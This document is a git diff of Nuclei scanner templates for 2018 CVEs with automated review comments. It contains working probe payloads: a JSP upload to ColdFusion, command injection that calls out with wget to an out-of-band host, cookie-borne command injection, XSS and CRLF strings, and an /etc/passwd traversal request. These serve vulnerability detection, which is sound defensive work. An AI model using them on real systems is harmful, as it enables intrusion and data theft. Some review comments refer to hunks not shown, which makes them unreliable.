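Review bot: In the CVE-2018-15917 hunk, the added reference `https://github.com/JavierOlmedo/JavierOlmedo` is a user profile rather than an advisory, exploit or fix for the CVE, so it gives a reader nothing to verify; drop it or replace it with the page that actually documents the finding. The EPSS update and the added `jorani_project` tag are fine. In the CVE-2018-15657 hunk, the two removed lines look like a blank line and `stop-at-first-match: true`; with a single path that option is a no-op, but the collapsed rendering makes it hard to be certain which line went, so it is worth a second look.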
diff --git a/nuclei-templates/CVE-2018/CVE-2018-15961.yaml b/nuclei-templates/CVE-2018/CVE-2018-15961.yaml deleted file mode 100644 index dcb8d6ce4f..0000000000 --- a/nuclei-templates/CVE-2018/CVE-2018-15961.yaml +++ /dev/null 
@@ -1,71 +0,0 @@ -id: CVE-2018-15961 - -info: - name: Adobe ColdFusion - Unrestricted File Upload Remote Code Execution - author: SkyLark-Lab,ImNightmaree - severity: critical - description: Adobe ColdFusion versions July 12 release (2018.0.0.310739), Update 6 and earlier, and Update 14 and earlier have an unrestricted file upload vulnerability. Successful exploitation could lead to arbitrary code execution. - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2018-15961 - - https://github.com/xbufu/CVE-2018-15961 - - https://helpx.adobe.com/security/products/coldfusion/apsb18-33.html - - http://web.archive.org/web/20220309060906/http://www.securitytracker.com/id/1041621 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2018-15961 - cwe-id: CWE-434 - metadata: - shodan-query: http.component:"Adobe ColdFusion" - tags: cve,cve2018,adobe,rce,coldfusion,fileupload,kev - -requests: - - raw: - - | - POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm HTTP/1.1 - Host: {{Hostname}} - Content-Type: multipart/form-data; boundary=---------------------------24464570528145 - - -----------------------------24464570528145 - Content-Disposition: form-data; name="file"; filename="{{randstr}}.jsp" - Content-Type: image/jpeg - - <%@ page import="java.util.*,java.io.*"%> - <%@ page import="java.security.MessageDigest"%> - <% - String cve = "CVE-2018-15961"; - MessageDigest alg = MessageDigest.getInstance("MD5"); - alg.reset(); - alg.update(cve.getBytes()); - byte[] digest = alg.digest(); - StringBuffer hashedpasswd = new StringBuffer(); - String hx; - for (int i=0;i - -----------------------------24464570528145 - Content-Disposition: form-data; name="path" - - {{randstr}}.jsp - -----------------------------24464570528145-- - - - | - GET /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/{{randstr}}.jsp HTTP/1.1 - Host: {{Hostname}} - - matchers-condition: and - matchers: - - - type: word - 
words: - - "ddbb3e76f92e78c445c8ecb392beb225" # MD5 of CVE-2018-15961 - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/04/22 diff --git a/nuclei-templates/CVE-2018/cve-2018-16059.yaml b/nuclei-templates/CVE-2018/CVE-2018-16059.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-16059.yaml rename to nuclei-templates/CVE-2018/CVE-2018-16059.yaml diff --git a/nuclei-templates/CVE-2018/CVE-2018-16139.yaml b/nuclei-templates/CVE-2018/CVE-2018-16139.yaml index 7914e0aad4..bcc16fdd8f 100644 --- a/nuclei-templates/CVE-2018/CVE-2018-16139.yaml +++ b/nuclei-templates/CVE-2018/CVE-2018-16139.yaml 
@@ -6,20 +6,32 @@ info: severity: medium description: | BIBLIOsoft BIBLIOpac 2008 contains a cross-site scripting vulnerability via the db or action parameter to bin/wxis.exe/bibliopac/, which allows a remote attacker to inject arbitrary web script or HTML. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary scripts in the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. + remediation: | + Apply the latest patch or upgrade to a newer version of BIBLIOsoft BIBLIOpac 2008 that addresses the XSS vulnerability. reference: - https://www.0x90.zone/web/xss/2019/02/01/XSS-Bibliosoft.html - https://nvd.nist.gov/vuln/detail/CVE-2018-16139 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2018-16139 cwe-id: CWE-79 + epss-score: 0.00135 + epss-percentile: 0.47838 + cpe: cpe:2.3:a:bibliosoft:bibliopac:2008:*:*:*:*:*:*:* metadata: + verified: true + max-request: 1 + vendor: bibliosoft + product: bibliopac shodan-query: title:"Bibliopac" - verified: "true" tags: cve,cve2018,xss,bibliopac,bibliosoft -requests: +http: - method: GET path: - '{{BaseURL}}/bibliopac/bin/wxis.exe/bibliopac/?IsisScript=bibliopac/bin/bibliopac.xic&db=">' @@ -39,5 +51,4 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/09/14 +# digest: 490a00463044022033723090a9b4a81b792ed6ecdaf230faf72fd66022ed67fae3697f90eff3b012022043a029915f1b514beac428b24c0629be457217dbe22ec11838076265cb09e9a5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2018/CVE-2018-16159.yaml b/nuclei-templates/CVE-2018/CVE-2018-16159.yaml index 4d7a296e5a..5880a66046 100644 --- a/nuclei-templates/CVE-2018/CVE-2018-16159.yaml +++ b/nuclei-templates/CVE-2018/CVE-2018-16159.yaml 
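Review bot: The new `remediation:` text, "Apply the latest patch or upgrade to a newer version of BIBLIOsoft BIBLIOpac 2008", names no fixed version and none of the references points to a vendor fix; if no fix is known, say so rather than implying one exists, e.g. `remediation: | No vendor fix is known; restrict access to bin/wxis.exe or filter the db and action parameters at the edge.` The two added references (`ARPSyndicate/cvemon`, `ARPSyndicate/kenzer-templates`) are aggregator repositories, not primary sources — keep the advisory and NVD links first and consider whether the aggregators add anything. The switch from `verified: "true"` to `verified: true` is a good correction.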
@@ -6,6 +6,8 @@ info: severity: critical description: | WordPress Gift Vouchers plugin before 4.1.8 contains a blind SQL injection vulnerability via the template_id parameter in a wp-admin/admin-ajax.php wpgv_doajax_front_template request. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to extract sensitive information from the database. remediation: Fixed in version 4.1.8. reference: - https://wpscan.com/vulnerability/9117 @@ -18,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2018-16159 cwe-id: CWE-89 - epss-score: 0.01247 - epss-percentile: 0.83951 + epss-score: 0.01228 + epss-percentile: 0.85084 cpe: cpe:2.3:a:codemenschen:gift_vouchers:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -27,7 +29,7 @@ info: vendor: codemenschen product: gift_vouchers framework: wordpress - tags: sqli,wordpress,unauth,wp,gift-voucher,cve2018,edb,wpscan,cve,wp-plugin + tags: cve,cve2018,sqli,wordpress,unauth,wp,gift-voucher,edb,wpscan,wp-plugin,codemenschen http: - raw: @@ -47,4 +49,4 @@ http: - 'contains(content_type, "application/json")' - 'contains(body, "images") && contains(body, "title")' condition: and -# digest: 4a0a0047304502204db9de27da4355303ce3f26b3965d0ac9ef7cd8f1d426322fc388101ad5e26d8022100fed92ddd286d58f1427af079347b6a48d343009bd603538ba5b99c5cec1c280d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202b1aa5555d71a8aca48bc022946bcdce1d30c66d55e0d3674a071d4f71c612ee022100956080f91d3386d400a3993d774251f5a2649171c661633597a767552865238a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2018/CVE-2018-16167.yaml b/nuclei-templates/CVE-2018/CVE-2018-16167.yaml index 3fdc81c692..905c2aa927 100644 --- a/nuclei-templates/CVE-2018/CVE-2018-16167.yaml +++ b/nuclei-templates/CVE-2018/CVE-2018-16167.yaml 
@@ -1,20 +1,20 @@ id: CVE-2018-16167 + info: - name: LogonTracer <=1.2.0 - Remote Command Injection + name: LogonTracer 1.2.0 - Remote Code Execution (Unauthenticated) author: gy741 severity: critical description: LogonTracer 1.2.0 and earlier allows remote attackers to execute arbitrary OS commands via unspecified vectors. reference: - https://www.exploit-db.com/exploits/49918 - https://nvd.nist.gov/vuln/detail/CVE-2018-16167 - - https://jvn.jp/en/vu/JVNVU98026636/index.html - - https://github.com/JPCERTCC/LogonTracer/releases/tag/v1.2.1 + tags: cve,cve2018,logontracer,rce,oast classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 + cvss-score: 9.80 cve-id: CVE-2018-16167 cwe-id: CWE-78 - tags: cve,cve2018,logontracer,rce,oast + requests: - raw: - | @@ -23,11 +23,10 @@ requests: Content-Type: application/x-www-form-urlencoded logtype=XML&timezone=1%3Bwget+http%3A%2F%2F{{interactsh-url}}%3B + matchers-condition: and matchers: - type: word part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" - -# Enhanced by mp on 2022/05/12 diff --git a/nuclei-templates/CVE-2018/cve-2018-16288.yaml b/nuclei-templates/CVE-2018/CVE-2018-16288.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-16288.yaml rename to nuclei-templates/CVE-2018/CVE-2018-16288.yaml diff --git a/nuclei-templates/CVE-2018/cve-2018-16299.yaml b/nuclei-templates/CVE-2018/CVE-2018-16299.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-16299.yaml rename to nuclei-templates/CVE-2018/CVE-2018-16299.yaml diff --git a/nuclei-templates/CVE-2018/CVE-2018-16670.yaml b/nuclei-templates/CVE-2018/CVE-2018-16670.yaml index b253aecfda..f9157661e3 100644 --- a/nuclei-templates/CVE-2018/CVE-2018-16670.yaml +++ b/nuclei-templates/CVE-2018/CVE-2018-16670.yaml 
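Review bot: The hunk drops the vendor fix reference `https://github.com/JPCERTCC/LogonTracer/releases/tag/v1.2.1` and the JVN advisory, leaving only the exploit-db and NVD links, so the template no longer points at the patched release; keep `- https://github.com/JPCERTCC/LogonTracer/releases/tag/v1.2.1`. The new name `LogonTracer 1.2.0 - Remote Code Execution (Unauthenticated)` reads as version-specific while the description still says "1.2.0 and earlier"; `LogonTracer <= 1.2.0 - Remote Code Execution (Unauthenticated)` matches the description. `cvss-score: 9.8` → `9.80` is the same formatting inconsistency noted on CVE-2018-14013.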
@@ -8,11 +8,6 @@ info: author: geeknik severity: medium tags: cve,cve2018,circarlife,scada,plc,iot,disclosure - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.30 - cve-id: CVE-2018-16670 - cwe-id: CWE-287 requests: - method: GET diff --git a/nuclei-templates/CVE-2018/cve-2018-16763.yaml b/nuclei-templates/CVE-2018/CVE-2018-16763.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-16763.yaml rename to nuclei-templates/CVE-2018/CVE-2018-16763.yaml diff --git a/nuclei-templates/CVE-2018/CVE-2018-16979.yaml b/nuclei-templates/CVE-2018/CVE-2018-16979.yaml index 3d076ff28e..d47482ca8a 100644 --- a/nuclei-templates/CVE-2018/CVE-2018-16979.yaml +++ b/nuclei-templates/CVE-2018/CVE-2018-16979.yaml 
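Review bot: The whole `classification:` block is removed, including `cve-id: CVE-2018-16670`, `cwe-id: CWE-287` and the CVSS vector, with nothing replacing it; every other CVE template in this commit carries that block, and downstream tooling that keys on `cve-id` loses this template. Restore the five removed lines (with `cvss-score: 5.3` if the short form is being standardized).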
@@ -1,24 +1,35 @@ id: CVE-2018-16979 info: - name: Monstra CMS V3.0.4 - HTTP Header Injection + name: Monstra CMS 3.0.4 - HTTP Header Injection author: 0x_Akoko severity: medium description: | - Monstra CMS V3.0.4 allows HTTP header injection in the plugins/captcha/crypt/cryptographp.php cfg parameter. + Monstra CMS 3.0.4 is susceptible to HTTP header injection in the plugins/captcha/crypt/cryptographp.php cfg parameter. An attacker can potentially supply invalid input and cause the server to allow redirects to attacker-controlled domains, perform cache poisoning, and/or allow improper access to virtual hosts not intended for this purpose. This is a related issue to CVE-2012-2943. + impact: | + This vulnerability can lead to various attacks such as session hijacking, cross-site scripting (XSS), and remote code execution (RCE). + remediation: | + Upgrade Monstra CMS to version 3.0.5 or later to mitigate the HTTP Header Injection vulnerability. reference: - https://github.com/howchen/howchen/issues/4 - https://nvd.nist.gov/vuln/detail/CVE-2018-16979 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2018-16979 cwe-id: CWE-113 + epss-score: 0.00141 + epss-percentile: 0.48943 + cpe: cpe:2.3:a:monstra:monstra:3.0.4:*:*:*:*:*:*:* metadata: - verified: "true" - tags: cve,cve2018,crlf,mostra,mostracms,cms + verified: true + max-request: 1 + vendor: monstra + product: monstra + tags: cve2018,cve,crlf,mostra,mostracms,cms,monstra,xss -requests: +http: - method: GET path: - "{{BaseURL}}/plugins/captcha/crypt/cryptographp.php?cfg=1%0D%0ASet-Cookie:%20crlfinjection=1" @@ -35,3 +46,4 @@ requests: - type: status status: - 200 +# digest: 4a0a004730450220359df7e2065adfbc0ae1d9925849e249fbf55ab2097a0772c448cf92859295d8022100c338b5305dccdd877fd16f538d35ac6ad5e43755e4536fc2556a368448d84c3c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
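Review bot: The new `impact:` text claims the issue "can lead to ... remote code execution (RCE)", but nothing in the template or its description supports that: the description describes header injection enabling redirects, cache poisoning and improper virtual-host access, the CWE is CWE-113, and the matcher only checks for a reflected `Set-Cookie` header. Suggest `impact: | An attacker can inject response headers to redirect users to attacker-controlled domains, poison caches, or reach virtual hosts not intended to be exposed.` The added `xss` tag has the same problem — the template does not test for XSS — and the misspelled `mostra`/`mostracms` tags are kept alongside the new `monstra` tag rather than replaced.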
diff --git a/nuclei-templates/CVE-2018/CVE-2018-17153.yaml b/nuclei-templates/CVE-2018/CVE-2018-17153.yaml index c21f23b526..2a1cad77ca 100644 --- a/nuclei-templates/CVE-2018/CVE-2018-17153.yaml +++ b/nuclei-templates/CVE-2018/CVE-2018-17153.yaml 
@@ -6,25 +6,31 @@ info: severity: critical description: | It was discovered that the Western Digital My Cloud device before 2.30.196 is affected by an authentication bypass vulnerability. An unauthenticated attacker can exploit this vulnerability to authenticate as an admin user without needing to provide a password, thereby gaining full control of the device. (Whenever an admin logs into My Cloud, a server-side session is created that is bound to the user's IP address. After the session is created, it is possible to call authenticated CGI modules by sending the cookie username=admin in the HTTP request. The invoked CGI will check if a valid session is present and bound to the user's IP address.) It was found that it is possible for an unauthenticated attacker to create a valid session without a login. The network_mgr.cgi CGI module contains a command called \"cgi_get_ipv6\" that starts an admin session -- tied to the IP address of the user making the request -- if the additional parameter \"flag\" with the value \"1\" is provided. Subsequent invocation of commands that would normally require admin privileges now succeed if an attacker sets the username=admin cookie. + impact: | + An attacker can bypass authentication and gain unauthorized access to the device, potentially leading to data theft or unauthorized control of the NAS. + remediation: | + Apply the latest firmware update provided by Western Digital to fix the authentication bypass vulnerability. 
reference: - https://web.archive.org/web/20170315123948/https://www.stevencampbell.info/2016/12/command-injection-in-western-digital-mycloud-nas/ - - https://nvd.nist.gov/vuln/detail/CVE-2016-10108 - https://packetstormsecurity.com/files/173802/Western-Digital-MyCloud-Unauthenticated-Command-Injection.html - https://securify.nl/nl/advisory/SFY20180102/authentication-bypass-vulnerability-in-western-digital-my-cloud-allows-escalation-to-admin-privileges.html + - https://nvd.nist.gov/vuln/detail/CVE-2016-10108 + - http://packetstormsecurity.com/files/173802/Western-Digital-MyCloud-Unauthenticated-Command-Injection.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2018-17153 cwe-id: CWE-287 - epss-score: 0.01264 + epss-score: 0.81607 + epss-percentile: 0.98273 cpe: cpe:2.3:o:western_digital:my_cloud_wdbctl0020hwt_firmware:*:*:*:*:*:*:*:* metadata: + verified: true max-request: 1 - shodan-query: http.favicon.hash:-1074357885 vendor: western_digital product: my_cloud_wdbctl0020hwt_firmware - verified: true - tags: cve,cve2018,auth-bypass,rce,wdcloud + shodan-query: http.favicon.hash:-1074357885 + tags: cve2018,cve,packetstorm,auth-bypass,rce,wdcloud,western_digital http: - raw: @@ -32,8 +38,6 @@ http: POST /web/google_analytics.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded; charset=UTF-8 - X-Requested-With: XMLHttpRequest - Referer: {{RootURL}} Cookie: isAdmin=1; username=admin; cmd=set&opt=cloud-device-num&arg=0|echo%20`id`%20%23 @@ -45,3 +49,4 @@ http: - contains(body, "ganalytics") - status_code == 200 condition: and +# digest: 4a0a00473045022058fcc54d2a071bc04ea653adf5ee59de019803e965720629f2964ae22dfd64d7022100e02c6520dab17c3043e6a4dfda4abd3a62adba7f445a07c4c91779a0ab1949fd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
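Review bot: The reference list now contains the same Packet Storm article twice (`https://packetstormsecurity.com/files/173802/...` kept as context and `http://packetstormsecurity.com/files/173802/...` added), and `https://nvd.nist.gov/vuln/detail/CVE-2016-10108` — a different CVE — is moved rather than corrected; drop the duplicate and either point the NVD link at CVE-2018-17153 or keep the 2016 entry with a note that it is the related command-injection issue. The raw request loses `X-Requested-With: XMLHttpRequest` and `Referer: {{RootURL}}`; whether the endpoint responds the same without them is not visible here, so confirm the template was actually re-tested after the removal, since `verified: true` is added in the same hunk. This hunk starts in the preceding line.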
diff --git a/nuclei-templates/CVE-2018/cve-2018-17246.yaml b/nuclei-templates/CVE-2018/CVE-2018-17246.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-17246.yaml rename to nuclei-templates/CVE-2018/CVE-2018-17246.yaml diff --git a/nuclei-templates/CVE-2018/cve-2018-17254.yaml b/nuclei-templates/CVE-2018/CVE-2018-17254.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-17254.yaml rename to nuclei-templates/CVE-2018/CVE-2018-17254.yaml diff --git a/nuclei-templates/CVE-2018/CVE-2018-17422.yaml b/nuclei-templates/CVE-2018/CVE-2018-17422.yaml deleted file mode 100644 index 39c4bb01f5..0000000000 --- a/nuclei-templates/CVE-2018/CVE-2018-17422.yaml +++ /dev/null @@ -1,34 +0,0 @@ -id: CVE-2018-17422 -info: - name: dotCMS < 5.0.2 - Open Redirect - author: 0x_Akoko,daffainfo - severity: medium - description: | - dotCMS before 5.0.2 has open redirects via the html/common/forward_js.jsp FORWARD_URL parameter or the html/portlet/ext/common/page_preview_popup.jsp hostname parameter. - reference: - - https://github.com/dotCMS/core/issues/15286 - - https://www.cvedetails.com/cve/CVE-2018-17422 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2018-17422 - cwe-id: CWE-601 - metadata: - shodan-query: http.title:"dotCMS" - verified: "true" - tags: cve,cve2018,redirect,dotcms -requests: - - method: GET - path: - - '{{BaseURL}}/html/common/forward_js.jsp?FORWARD_URL=http://www.example.com' - - '{{BaseURL}}/html/portlet/ext/common/page_preview_popup.jsp?hostname=example.com' - stop-at-first-match: true - matchers-condition: and - matchers: - - type: word - part: body - words: - - "self.location = 'http://www.example.com'" - - type: status - status: - - 200 
diff --git a/nuclei-templates/CVE-2018/cve-2018-17431.yaml b/nuclei-templates/CVE-2018/CVE-2018-17431.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-17431.yaml rename to nuclei-templates/CVE-2018/CVE-2018-17431.yaml diff --git a/nuclei-templates/CVE-2018/CVE-2018-18069.yaml b/nuclei-templates/CVE-2018/CVE-2018-18069.yaml deleted file mode 100644 index 0ffc225e0b..0000000000 --- a/nuclei-templates/CVE-2018/CVE-2018-18069.yaml +++ /dev/null @@ -1,32 +0,0 @@ -id: CVE-2018-18069 -info: - name: WordPress sitepress-multilingual-cms 3.6.3 - Cross-Site Scripting - author: nadino - severity: medium - description: WordPress plugin sitepress-multilingual-cms 3.6.3 is vulnerable to cross-site scripting in process_forms via any locale_file_name_ parameter (such as locale_file_name_en) in an authenticated theme-localization.php request to wp-admin/admin.php. - reference: - - https://0x62626262.wordpress.com/2018/10/08/sitepress-multilingual-cms-plugin-unauthenticated-stored-xss/ - - https://nvd.nist.gov/vuln/detail/CVE-2018-18069 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2018-18069 - cwe-id: CWE-79 - tags: cve,cve2018,wordpress,xss,plugin -requests: - - method: POST - path: - - "{{BaseURL}}/wp-admin/admin.php" - body: | - icl_post_action=save_theme_localization&locale_file_name_en=EN"> - redirects: true - max-redirects: 2 - matchers: - - type: dsl - dsl: - - 'contains(tolower(all_headers), "text/html")' - - 'contains(set_cookie, "_icl_current_admin_language")' - - 'contains(body, "\">")' - condition: and - -# Enhanced by mp on 2022/04/08 diff --git a/nuclei-templates/CVE-2018/CVE-2018-18264.yaml b/nuclei-templates/CVE-2018/CVE-2018-18264.yaml index 265a0ab403..c0b21f42aa 100644 --- a/nuclei-templates/CVE-2018/CVE-2018-18264.yaml +++ b/nuclei-templates/CVE-2018/CVE-2018-18264.yaml 
@@ -1,33 +1,51 @@ id: CVE-2018-18264 + info: - name: Kubernetes Dashboard unauthenticated secret access + name: Kubernetes Dashboard <1.10.1 - Authentication Bypass author: edoardottt severity: high - description: Kubernetes Dashboard before 1.10.1 allows attackers to bypass authentication and use Dashboard's Service Account for reading secrets within the cluster. + description: | + Kubernetes Dashboard before 1.10.1 allows attackers to bypass authentication and use Dashboard's Service Account for reading secrets within the cluster. + impact: | + An attacker can bypass authentication and gain unauthorized access to the Kubernetes Dashboard, potentially leading to further compromise of the Kubernetes cluster. + remediation: | + Upgrade to Kubernetes Dashboard version 1.10.1 or later to mitigate the authentication bypass vulnerability. reference: - - https://nvd.nist.gov/vuln/detail/CVE-2018-18264 - https://github.com/kubernetes/dashboard/pull/3289 - https://sysdig.com/blog/privilege-escalation-kubernetes-dashboard/ - https://groups.google.com/forum/#!topic/kubernetes-announce/yBrFf5nmvfI + - https://nvd.nist.gov/vuln/detail/CVE-2018-18264 + - https://github.com/kubernetes/dashboard/pull/3400 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2018-18264 cwe-id: CWE-306 + epss-score: 0.96092 + epss-percentile: 0.99459 + cpe: cpe:2.3:a:kubernetes:dashboard:*:*:*:*:*:*:*:* metadata: + max-request: 2 + vendor: kubernetes + product: dashboard shodan-query: product:"Kubernetes" - tags: cve,cve2018,kubernetes,k8s,unauth -requests: + tags: cve,cve2018,kubernetes,k8s,auth-bypass + +http: - method: GET path: - "{{BaseURL}}/api/v1/namespaces/kube-system/secrets/kubernetes-dashboard-certs" - "{{BaseURL}}/k8s/api/v1/namespaces/kube-system/secrets/kubernetes-dashboard-certs" + stop-at-first-match: true + matchers-condition: and matchers: - - type: status - status: - - 200 - type: dsl dsl: - 'contains(body, "apiVersion") && 
contains(body, "objectRef")' + + - type: status + status: + - 200 +# digest: 4a0a00473045022100921dd75b1c4fd5bb0371f58e6411d7e4a06e9735d08963cb9f30cc658605c4ac02201a2470f007b63400ce14203c27f974db451f5e977b2d72cbb796458ce436c080:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2018/cve-2018-18323.yaml b/nuclei-templates/CVE-2018/CVE-2018-18323.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-18323.yaml rename to nuclei-templates/CVE-2018/CVE-2018-18323.yaml diff --git a/nuclei-templates/CVE-2018/CVE-2018-18570.yaml b/nuclei-templates/CVE-2018/CVE-2018-18570.yaml index d151172aa1..51249a06a8 100644 --- a/nuclei-templates/CVE-2018/CVE-2018-18570.yaml +++ b/nuclei-templates/CVE-2018/CVE-2018-18570.yaml @@ -7,25 +7,29 @@ info: reference: - https://www2.deloitte.com/de/de/pages/risk/articles/planon-cross-site-scripting.html - https://nvd.nist.gov/vuln/detail/CVE-2018-18570 + tags: xss,cve,cve2018,planon classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 + cvss-score: 6.10 cve-id: CVE-2018-18570 cwe-id: CWE-79 - tags: xss,cve,cve2018,planon + requests: - method: GET path: - '{{BaseURL}}/wicket/resource/nl.planon.pssm.dashboard.cre.engine.wicket.page.AbstractDashboardPage/html/nodata.html?nodatamsg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + matchers-condition: and matchers: - type: status status: - 200 + - type: word words: - "" part: body + - type: word words: - "text/html" diff --git a/nuclei-templates/CVE-2018/CVE-2018-18608.yaml b/nuclei-templates/CVE-2018/CVE-2018-18608.yaml deleted file mode 100644 index c5b0ac561d..0000000000 --- a/nuclei-templates/CVE-2018/CVE-2018-18608.yaml +++ /dev/null 
@@ -1,46 +0,0 @@ -id: CVE-2018-18608 - -info: - name: DedeCMS 5.7 SP2 - Cross-Site Scripting - author: ritikchaddha - severity: medium - description: | - DedeCMS 5.7 SP2 is vulnerable to cross-site scripting via the function named GetPageList defined in the include/datalistcp.class.php file that is used to display the page numbers list at the bottom of some templates, as demonstrated by the PATH_INFO to /member/index.php, /member/pm.php, /member/content_list.php, or /plus/feedback.php. - reference: - - https://github.com/ky-j/dedecms/issues/8 - - https://github.com/ky-j/dedecms/files/2504649/Reflected.XSS.Vulnerability.exists.in.the.file.of.DedeCMS.V5.7.SP2.docx - - https://nvd.nist.gov/vuln/detail/CVE-2018-18608 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2018-18608 - cwe-id: CWE-79 - metadata: - shodan-query: http.html:"DedeCms" - verified: "true" - tags: dedecms,xss,cve,cve2018 - -requests: - - method: GET - path: - - "{{BaseURL}}/plus/feedback.php/rp4hu%27>" - - "DedeCMS Error Warning!" - condition: and - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/08/18 diff --git a/nuclei-templates/CVE-2018/CVE-2018-18778.yaml b/nuclei-templates/CVE-2018/CVE-2018-18778.yaml new file mode 100644 index 0000000000..6c269ecee5 --- /dev/null +++ b/nuclei-templates/CVE-2018/CVE-2018-18778.yaml 
@@ -0,0 +1,30 @@ +id: CVE-2018-18778 +info: + name: mini_httpd Path Traversal + author: dhiyaneshDK + severity: medium + description: ACME mini_httpd before 1.30 lets remote users read arbitrary files. + reference: + - https://www.acunetix.com/vulnerabilities/web/acme-mini_httpd-arbitrary-file-read/ + - http://www.acme.com/software/mini_httpd/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N + cvss-score: 6.5 + cve-id: CVE-2018-18778 + cwe-id: CWE-200 + tags: cve,cve2018,lfi,mini_httpd +requests: + - raw: + - |+ + GET /etc/passwd HTTP/1.1 + Host: + + unsafe: true + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: regex + regex: + - "root:.*:0:0:" diff --git a/nuclei-templates/CVE-2018/CVE-2018-18809.yaml b/nuclei-templates/CVE-2018/CVE-2018-18809.yaml index 610ba2192c..32940d4fec 100644 --- a/nuclei-templates/CVE-2018/CVE-2018-18809.yaml +++ b/nuclei-templates/CVE-2018/CVE-2018-18809.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | The default server implementation of TIBCO Software Inc.'s TIBCO JasperReports Library, TIBCO JasperReports Library Community Edition, TIBCO JasperReports Library for ActiveMatrix BPM, TIBCO JasperReports Server, TIBCO JasperReports Server Community Edition, TIBCO JasperReports Server for ActiveMatrix BPM, TIBCO Jaspersoft for AWS with Multi-Tenancy, and TIBCO Jaspersoft Reporting and Analytics for AWS contains a directory-traversal vulnerability that may theoretically allow web server users to access contents of the host system. + impact: | + An attacker can access sensitive files, potentially leading to unauthorized disclosure of sensitive information. remediation: | Apply the latest security patches or upgrade to a patched version of TIBCO JasperReports Library. reference: 
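Review bot: The raw request sends `Host:` with no value, which reads like an omission next to the `Host: {{Hostname}}` used by every other raw template in this commit; if the empty header is the trigger condition (the `|+` block scalar and `unsafe: true` suggest the exact bytes are deliberate), a comment such as `# Host is intentionally empty; do not substitute {{Hostname}}` above the raw block would stop a later reformat from breaking the check. The new file also has no `https://nvd.nist.gov/vuln/detail/CVE-2018-18778` reference, no `metadata` block and no `# digest:` trailer, unlike the templates updated elsewhere in this commit, so it would be unsigned if the repository relies on template signatures.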
